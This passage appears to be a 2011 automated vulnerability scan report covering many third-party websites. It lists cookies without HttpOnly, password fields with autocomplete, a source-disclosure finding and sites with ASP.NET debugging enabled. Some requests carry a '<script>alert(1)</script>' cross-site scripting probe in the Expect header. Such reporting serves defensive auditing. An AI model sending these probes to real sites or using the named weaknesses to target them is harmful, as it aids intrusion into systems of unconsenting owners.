13.222. http://www.sueddeutsche.de/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sueddeutsche.de
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerlb-phpapp_http=1762270892.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.sueddeutsche.de
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 417 Expectation Failed
Retry-After: 0
Content-Length: 63
Date: Tue, 03 May 2011 10:20:41 GMT
Connection: close
X-Cache: MISS
X-PHP-Served-By: red-web-5
Set-Cookie: BIGipServerlb-phpapp_http=1762270892.20480.0000; path=/

13.223. http://www.superstreetonline.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.superstreetonline.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UserPuid=2310453048226087200; domain=superstreetonline.com; expires=Tue, 03-May-2061 10:32:13 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.224. http://www.surveymk.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.surveymk.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CookieMonkey=1057227018.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.surveymk.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 132
Content-Type: text/html; charset=utf-8
Location: /Default.aspx
X-ServerID: 61
Date: Tue, 03 May 2011 10:54:32 GMT
Set-Cookie: CookieMonkey=1057227018.20480.0000; path=/
X-Powered-By: Bananas and Rum
X-Monkey-Sign: Screaming Monkeys

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2fDefault.aspx">here</a>.</h2>
</body></html>

13.225. http://www.swiss.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.swiss.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Swiss.com_COOKIE=R2374117222; path=/; expires=Tue, 03-May-2011 11:42:49 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.swiss.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: Swiss.com_COOKIE=R2374117222; path=/; expires=Tue, 03-May-2011 11:42:49 GMT
Connection: Keep-Alive
Content-Length: 766
Date: Tue, 03 May 2011 11:12:03 GMT
Content-Type: image/x-icon
ETag: "0c0fab5ecec91:0"
Server: Microsoft-IIS/7.0
Cache-Control: max-age=900
Last-Modified: Wed, 06 May 2009 15:19:28 GMT
Accept-Ranges: bytes
X-Powered-By: ASP.NET
MicrosoftSharePointTeamServices: 12.0.0.6520

...... ..............(... ...@....................................... .......................................................""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""
...[SNIP]...

13.226. http://www.tapartoche.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tapartoche.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

90plan=R3938888862; path=/; expires=Thu, 05-May-2011 23:43:10 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tapartoche.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie: 90plan=R3938888862; path=/; expires=Thu, 05-May-2011 23:43:10 GMT
Date: Tue, 03 May 2011 11:33:59 GMT
Server: Apache/2.2.X (OVH)
Last-Modified: Sat, 09 Jun 2007 17:49:43 GMT
ETag: "743768-10be-4327cc5d13bc0"
Accept-Ranges: bytes
Content-Length: 4286
Content-Type: image/vnd.microsoft.icon

...... .... .........(... ...@..... ...................................................................................................................................................................
...[SNIP]...

13.227. http://www.thinkfashion.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.thinkfashion.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerMIS-WEB20-5=167918602.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thinkfashion.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Length: 2550
Content-Type: image/x-icon
Last-Modified: Tue, 22 Jul 2008 18:16:15 GMT
Accept-Ranges: bytes
ETag: "eae647727ecc81:35c"
Server: Microsoft-IIS/6.0
Server-Name: MIS-WEB20f
P3P: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:42:09 GMT
Set-Cookie: BIGipServerMIS-WEB20-5=167918602.20480.0000; path=/

..............h...&......... .h.......(....... ...........@.........................................................................~.kX...q...q...q...q...q...q...q...q................................
...[SNIP]...

13.228. http://www.tldm.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tldm.org
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

EGSOFT_ID=173.193.214.243-3202878960.30148990; expires=Fri, 31-Dec-2010 00:00:00 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tldm.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
MicrosoftOfficeWebServer: 5.0_Pub
Date: Tue, 03 May 2011 10:42:06 GMT
Content-Type: image/x-icon
Accept-Ranges: bytes
Last-Modified: Tue, 06 Apr 2010 16:51:34 GMT
ETag: "0af1d6aa9d5ca1:aba"
Set-Cookie: EGSOFT_ID=173.193.214.243-3202878960.30148990; expires=Fri, 31-Dec-2010 00:00:00 GMT; path=/
Content-Length: 1150

............ .h.......(....... ..... .....................................................................................y...AEE.............tyx......................~..................oss.MMM.......
...[SNIP]...

13.229. http://www.trade-schools.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.trade-schools.net
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

WEBTRENDS_ID=173.193.214.243-1791280848.30148987; expires=Wed, 02-May-2012 10:18:16 GMT; path=/
WEBTRENDS_ID=173.193.214.243-1791130848.30148987; expires=Wed, 02-May-2012 10:18:16 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.trade-schools.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Set-Cookie:WEBTRENDS_ID=173.193.214.243-1791280848.30148987; expires=Wed, 02-May-2012 10:18:16 GMT; path=/
Set-Cookie:WEBTRENDS_ID=173.193.214.243-1791130848.30148987; expires=Wed, 02-May-2012 10:18:16 GMT; path=/
Date: Tue, 03 May 2011 10:18:16 GMT
Content-Length: 1150
Content-Type: image/x-icon
Last-Modified: Wed, 19 Jan 2011 22:09:07 GMT
Accept-Ranges: bytes
ETag: "80c38e7d25b8cb1:39c"
Server: Microsoft-IIS/6.0

............ .h.......(....... ..... .....@.....................................fa..f...f...f...f...f...f...fa...........................!..~...f...........................f...f...f!...............!..
...[SNIP]...

13.230. http://www.tvrepairman.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.tvrepairman.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

osid=site1~3ed33bac41a0bdbfde1316c36e69cdb00e8a9482; expires=Tue, 03 May 2011 12:06:01 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tvrepairman.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:06:01 GMT
Content-Length: 27784
Content-Type: text/html;charset=utf-8
Set-Cookie: osid=site1~3ed33bac41a0bdbfde1316c36e69cdb00e8a9482; expires=Tue, 03 May 2011 12:06:01 GMT; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http
...[SNIP]...

13.231. http://www.twilightersanonymous.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.twilightersanonymous.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

__cfduid=d70863eeee52760fadc52e4eef49d29211304418604; expires=Mon, 23 Dec 2019 23:50:00 GMT; path=/; domain=.twilightersanonymous.com
__cfduid=d70863eeee52760fadc52e4eef49d29211304418604; expires=Mon, 23 Dec 2019 23:50:00 GMT; path=/; domain=.www.twilightersanonymous.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.232. http://www.twoofus.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.twoofus.org
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

loadbalancer-20480=ENOLOGMOFAAA; Expires=Fri, 30-Apr-2021 10:36:16 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.twoofus.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Content-Length: 8569
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:54:17 GMT
Set-Cookie: loadbalancer-20480=ENOLOGMOFAAA; Expires=Fri, 30-Apr-2021 10:36:16 GMT; Path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

13.233. http://www.upmystreet.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.upmystreet.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

uswitch=1711344138.16415.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.upmystreet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Tue, 03 May 2011 11:21:18 GMT
Content-Type: image/x-icon
Content-Length: 1150
Last-Modified: Tue, 10 Aug 2010 10:44:55 GMT
Connection: keep-alive
Accept-Ranges: bytes
Set-Cookie: uswitch=1711344138.16415.0000; path=/

............ .h.......(....... ..... ..........................O...H.E.I.\.I. .........I...I.>.I.Z.I...........................H.-.I...I...I...I.......I.&.I...I...I.u.........................H.-.I...I
...[SNIP]...

13.234. http://www.vitamin-insight.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.vitamin-insight.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

PSGUID=b8b76ab2-bbbb-4a7e-b7fc-4e4ae5b289ed; expires=Thu, 02-Jun-2011 10:21:55 GMT; path=/
BIGipServerWEBFX-2=2550283274.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.vitamin-insight.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Location: http://media.vitamin-insight.com/i/favicon.ico
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=g3s4kjzmey1eak55ybbeleau; path=/; HttpOnly
Set-Cookie: PSGUID=b8b76ab2-bbbb-4a7e-b7fc-4e4ae5b289ed; expires=Thu, 02-Jun-2011 10:21:55 GMT; path=/
X-AspNet-Version: 2.0.50727
Server-Name: MIS-WEB90A
P3P: CP="CAO PSA OUR"
Date: Tue, 03 May 2011 10:21:55 GMT
Content-Length: 0
Set-Cookie: BIGipServerWEBFX-2=2550283274.20480.0000; path=/

13.235. http://www.webcpa.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.webcpa.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Coyote-2-a011339=a011069:0; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.webcpa.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 03 May 2011 11:16:16 GMT
Server: Apache/2
Location: http://www.accountingtoday.com/favicon.ico
Content-Length: 250
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: Coyote-2-a011339=a011069:0; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.accountingto
...[SNIP]...

13.236. http://www.whitepage.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.whitepage.net
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerp-directory=990036746.20480.0000;domain=whitepage.net; expires=Tue, 03-May-2011 12:23:57 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.237. http://www.worldfriends.tv/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.worldfriends.tv
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServerWFN_NEW_APPLICATION=3171002560.36895.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.worldfriends.tv
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 /favicon.ico
Server: Apache-Coyote/1.1
ETag: W/"2787-1298280766000"
Last-Modified: Mon, 21 Feb 2011 09:32:46 GMT
Content-Type: text/html
Content-Length: 2787
Date: Tue, 03 May 2011 10:53:24 GMT
Set-Cookie: BIGipServerWFN_NEW_APPLICATION=3171002560.36895.0000; path=/

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Page Not Found</title>
<script language="javascript" src="/common/v4/js/jquery.js?v1.4.4" type="text/java
...[SNIP]...

13.238. http://www.yadvashem.org/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.yadvashem.org
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

BIGipServerWPSRV-POOL=2400905423.20480.0000; path=/
BIGipServerWWW-ASM=169934858.0.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yadvashem.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 11:36:23 GMT
Server: IBM_HTTP_Server
Content-Length: 328
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: BIGipServerWPSRV-POOL=2400905423.20480.0000; path=/
Set-Cookie: BIGipServerWWW-ASM=169934858.0.0000; path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico was not found on this server.</p>
<p>Add
...[SNIP]...

13.239. http://www.zegeridotc.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.zegeridotc.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

unique_visitor=173.193.214.243.1304418605729407; path=/; expires=Wed, 02-May-12 10:30:05 GMT
BIGipServerwww.zegeridotc.com-HTTP=2710245548.20480.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.zegeridotc.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:30:05 GMT
Server: Apache
Set-Cookie: unique_visitor=173.193.214.243.1304418605729407; path=/; expires=Wed, 02-May-12 10:30:05 GMT
Accept-Ranges: bytes
Content-Length: 144
Content-Type: text/html
Set-Cookie: BIGipServerwww.zegeridotc.com-HTTP=2710245548.20480.0000; path=/

<html>
<head>
<title>zegeridotc</title>
</HEAD>
<BODY><p>The site is under maintenance. It will be available shortly.</p></BODY>
</HTML>

14. Password field with autocomplete enabled previous next
There are 9 instances of this issue:

http://www.ascp.org/favicon.ico
http://www.atomiclearning.com/favicon.ico
http://www.bikersingle.com/favicon.ico
http://www.conscallhome.com/favicon.ico
http://www.extrabux.com/favicon.ico
http://www.restaurantrow.com/favicon.ico
http://www.voa.org/favicon.ico
http://www.xcomment.com/favicon.ico
http://www.xcomment.com/favicon.ico

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

14.1. http://www.ascp.org/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.ascp.org
Path:	/favicon.ico

Issue detail

The page contains a form with the following action URL:

http://www.ascp.org/favicon.ico.aspx

The form contains the following password field with autocomplete enabled:

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.ascp.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

14.2. http://www.atomiclearning.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.atomiclearning.com
Path:	/favicon.ico

Issue detail

The page contains a form with the following action URL:

https://secure2.atomiclearning.com/platform

The form contains the following password field with autocomplete enabled:

password

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.atomiclearning.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:15:56 GMT
Server: Apache
Content-Length: 41708
Set-Cookie: platform_session=0684a7b9b10d110d27b33995013bac6e15572167; domain=atomiclearning.com; path=/; HttpOnly
P3P: CP="CAO PSA OUR"
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- served from pl
...[SNIP]...
</a>

<form id='user_login_form' method="post" action="https://secure2.atomiclearning.com/platform" style="padding-left:4px;">
<input type="hidden" value="" name="referer" />
...[SNIP]...
<br/>
<input name="password" type="password" id="popuppassword" size="30" />
<br/>
...[SNIP]...

14.3. http://www.bikersingle.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.bikersingle.com
Path:	/favicon.ico

Issue detail

The page contains a form with the following action URL:

http://www.bikersingle.com/login.asp?logintimes=1

The form contains the following password field with autocomplete enabled:

password

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bikersingle.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

14.4. http://www.conscallhome.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.conscallhome.com
Path:	/favicon.ico

Issue detail

The page contains a form with the following action URL:

https://secure.conscallhome.com/login/loginuser.cfm

The form contains the following password field with autocomplete enabled:

password

Request

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: CFID=276976;expires=Thu, 25-Apr-2041 10:42:55 GMT;path=/
Set-Cookie: CFTOKEN=85670812;expires=Thu, 25-Apr-2041 10:42:55 GMT;path=/
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:42:55 GMT
Content-Length: 13361



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.
...[SNIP]...
<div style="background:#F4F4F4; height:50px; padding:2px;">

           <form id="form1" name="form1" method="post" action="https://secure.conscallhome.com/login/loginuser.cfm">
<label>
...[SNIP]...
</label>
            <input name="password" type="password" class="maintext" id="password" size="15" />
            <label>
...[SNIP]...

14.5. http://www.extrabux.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.extrabux.com
Path:	/favicon.ico

Issue detail

The page contains a form with the following action URL:

http://www.extrabux.com/users/login

The form contains the following password field with autocomplete enabled:

password

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.extrabux.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

14.6. http://www.restaurantrow.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.restaurantrow.com
Path:	/favicon.ico

Issue detail

The page contains a form with the following action URL:

http://www.restaurantrow.com/l_redirect.cfm

The form contains the following password field with autocomplete enabled:

password

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.restaurantrow.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

14.7. http://www.voa.org/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.voa.org
Path:	/favicon.ico

Issue detail

The page contains a form with the following action URL:

http://www.voa.org/favicon.ico

The form contains the following password field with autocomplete enabled:

VOALogin$Password

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.voa.org
Accept: */*
Proxy-Connection: Keep-Alive

Response

14.8. http://www.xcomment.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.xcomment.com
Path:	/favicon.ico

Issue detail

The page contains a form with the following action URL:

http://www.xcomment.com/loginsubmit.php

The form contains the following password field with autocomplete enabled:

password

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.xcomment.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

14.9. http://www.xcomment.com/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.xcomment.com
Path:	/favicon.ico

Issue detail

The page contains a form with the following action URL:

http://www.xcomment.com/loginsubmit.php

The form contains the following password field with autocomplete enabled:

password

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.xcomment.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:15:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Content-Type: text/html
Content-Length: 38308

<html>
<head>
<meta name="description" content="X-Comment - MySpace Graphics and Pictures for MySpace Comments">
<meta name="keywords" content=" myspace picture comments, myspace comments, myspace g
...[SNIP]...
<table width="149" height="68" border="0" cellpadding="0" cellspacing="0">
<form name="loginsubmit" method="post" action="http://www.xcomment.com/loginsubmit.php">
<tr>
...[SNIP]...
<td class="categorynavlink"><input name="password" type="password" id="password" size="10" ></td>
...[SNIP]...

15. Source code disclosure previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	http://www.fellowes.com
Path:	/favicon.ico

Issue detail

The application appears to disclose some server-side source code written in JSP.

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.fellowes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

16. ASP.NET debugging enabled previous next
There are 69 instances of this issue:

http://www.aaaorid.com/Default.aspx
http://www.adftrack.com/Default.aspx
http://www.algebralab.org/Default.aspx
http://www.baen.com/Default.aspx
http://www.baskinghill.com/Default.aspx
http://www.bhgrealestate.com/Default.aspx
http://www.bookmaker.com/Default.aspx
http://www.brightonfnl.com/Default.aspx
http://www.classicsonline.com/Default.aspx
http://www.coloniallife.com/Default.aspx
http://www.coxenterprises.com/Default.aspx
http://www.creditacceptance.com/Default.aspx
http://www.cupsultana.com/Default.aspx
http://www.elpasoco.com/Default.aspx
http://www.embark.com/Default.aspx
http://www.endlessvacation.com/Default.aspx
http://www.esc4.net/Default.aspx
http://www.firstresponse.com/Default.aspx
http://www.freecampgrounds.com/Default.aspx
http://www.freeltcquotes.com/Default.aspx
http://www.freightlinertrucks.com/Default.aspx
http://www.geniecompany.com/Default.aspx
http://www.goldenlivingcenters.com/Default.aspx
http://www.gottashopdeals.com/Default.aspx
http://www.govcourtregistry.com/Default.aspx
http://www.justgiving.com/Default.aspx
http://www.kiwikp.com/Default.aspx
http://www.kohlerplus.com/Default.aspx
http://www.landsharklager.com/Default.aspx
http://www.lunchprepay.com/Default.aspx
http://www.marioncountyfl.org/Default.aspx
http://www.maxwebsavings.com/Default.aspx
http://www.moneymailer.com/Default.aspx
http://www.moveforfree.com/Default.aspx
http://www.nccde.org/Default.aspx
http://www.neatco.com/Default.aspx
http://www.needlepointers.com/Default.aspx
http://www.netfit.co.uk/Default.aspx
http://www.outsideinfo.com/Default.aspx
http://www.pgcc.edu/Default.aspx
http://www.picnet.com.au/Default.aspx
http://www.pnf.com/Default.aspx
http://www.pnwboces.org/Default.aspx
http://www.polarispartshouse.com/Default.aspx
http://www.primos.com/Default.aspx
http://www.psoriasis.org/Default.aspx
http://www.realbird.com/Default.aspx
http://www.ritasice.com/Default.aspx
http://www.roundtablepizza.com/Default.aspx
http://www.runreappear.com/Default.aspx
http://www.sfgotobat.com/Default.aspx
http://www.smith-county.com/Default.aspx
http://www.stjohnprovidence.org/Default.aspx
http://www.suppress003.com/Default.aspx
